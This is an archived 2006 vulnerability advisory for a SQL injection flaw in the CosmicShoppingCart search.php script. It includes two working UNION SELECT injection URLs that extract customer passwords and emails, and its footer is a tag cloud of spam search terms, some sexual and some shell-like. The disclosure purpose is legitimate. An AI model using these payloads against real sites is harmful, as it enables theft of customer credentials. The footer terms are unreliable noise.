about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , CosmicShoppingCart (search.php) Remote SQL Injection Vulnerability



2006-05-28 CosmicShoppingCart (search.php) Remote SQL Injection Vulnerability
Rated as : Moderate Risk

Software: CosmicShoppingCart (www.cosmicphp.com)
Risk: Medium
Discovered by: Vympel (Marcelo Almeida)
Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a
fully customizable, shopping cart designed.

SQL injections have been found, they could be exploited by users to
retrieve the passwords of the admin.

Examples:
cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/*
cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--
securitydot.net - 2006-05-28

Advertising

Copyright 2007, SecurityDot
Sat, 28 Nov 2009 03:58:17 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Trishabath fari Sex in sch Www.freepo Photo+xxl Www.freepo newsforcra dhsch.5d6d www.518520 www.hbttgw wild sex ipanel Footsiebab 200 /compo apache mod www.benben www.520712 p...d.php? sexx,com www.czfaff secure www.syxq8. ashley tis gp codes Www.Cartoo Kidssex.co www.520xxw Kidssex.co cat /error Ngentot an cerita sex kerberos 59bu.com www.17pg.c Www.Cartoo WWW.SEX FR www.sextam cat+%252Fi HOTGIRLSEX www.v2jw.c sendcard www.52gstx www.v2jw.c news for c www.7zhaot Amazing Bo Pakistanis Free doun goodtea114 www.zye88.